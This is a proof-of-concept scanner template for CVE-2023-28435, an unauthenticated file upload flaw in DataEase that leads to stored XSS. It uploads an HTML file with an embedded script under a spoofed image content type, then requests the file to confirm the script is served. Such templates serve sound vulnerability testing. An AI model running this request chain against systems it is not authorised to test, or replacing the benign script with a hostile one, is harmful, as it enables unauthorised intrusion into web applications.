The file upload interface is not checked for permissions,
so users who are not logged in can upload any file directly to the background,
and the file type is not checked, so they can upload any type of file
ps:上传文件后,通过路径/static-resource/{{ranfilename}}.html触发xss
PoC代码[已公开]
id: CVE-2023-28435
info:
name: File upload interface does not do permission verification exists XSS vulnerability
author: hbdxmz
severity: high
verified: true
description: |
The file upload interface is not checked for permissions,
so users who are not logged in can upload any file directly to the background,
and the file type is not checked, so they can upload any type of file
ps:上传文件后,通过路径/static-resource/{{ranfilename}}.html触发xss
reference:
- https://github.com/dataease/dataease/security/advisories/GHSA-625h-q3g9-rffc
created: 2023/11/30
set:
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /static/resource/upload/b1ace870-c3d6-11ed-9218-{{rboundary}}
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\";filename=\"1.html\"\r\n\
Content-Type: image/png\r\n\r\n\
<html><script>console.log(\"Hello\")</script></html>\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"success":true')
r1:
request:
method: GET
path: /static-resource/b1ace870-c3d6-11ed-9218-{{rboundary}}.html
expression: response.status == 200 && response.body.bcontains(b'console.log("Hello")')
expression: r0()&&r1()